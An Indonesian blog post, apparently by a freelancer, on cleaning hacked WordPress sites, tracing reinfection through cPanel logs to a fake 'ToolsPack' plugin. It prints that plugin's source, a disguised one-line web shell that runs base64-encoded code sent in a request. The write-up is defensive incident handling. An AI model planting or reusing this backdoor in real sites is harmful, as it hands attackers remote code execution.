Assalamualaikum,
Kemarin saya dapat job bersih-bersih website WordPress punya client. Ada sekitar 7 website yang harus dibersihkan dan sekaligus dipindah ke hosting lain. Dia menggunakan 1 akun untuk menjalankan 10 website lebih. Tentu saja dari segi keamanan akan lebih mudah diserang. Agar lebih mudah identifikasi script yang ditanam penyusup maka saya memindahkan semua websitenya terlebih dahulu ke hosting yang baru dan kali ini satu akun untuk satu website (dia punya akses WHM di hosting yang baru). Setelah dipindah maka saya coba buka file index.php yang ternyata telah disusupi script untuk meredirect pengunjung ke website milik penyusup. Saya reupgrade saja WordPress core pada semua website agar file-file yang diedit kembali lagi.
Setelah 1 hari dia lapor bahwa dia dapat peringatan lagi dari antivirus yang ada di komputernya bahwa website milik dia mengandung virus (maklum yang mendeteksi antivirus). Saya cek ternyata file index.php kembali diedit. Saya coba buka visitors logs di CPanel, saya cek satu-satu apa saja yang dibuka visitor. Ada 1 visitor yang beberapa kali mengunjungi file wp-content/plugins/ToolsPack/ToolsPack.php. Saya coba buka file tersebut dan isinya adalah:
<?php /* Plugin Name: ToolsPack Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated! Version: 1.2 Author: Mark Stain Author URI: http://checkWPTools.com/ */ $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit; ?>
Ternyata penyusup masuk lewat sini. Langsung saja saya hapus pluginnya, saya benerin lagi file-file yang diedit dan saya masukkin IP Deny buat IP yang dipakai penyusup.
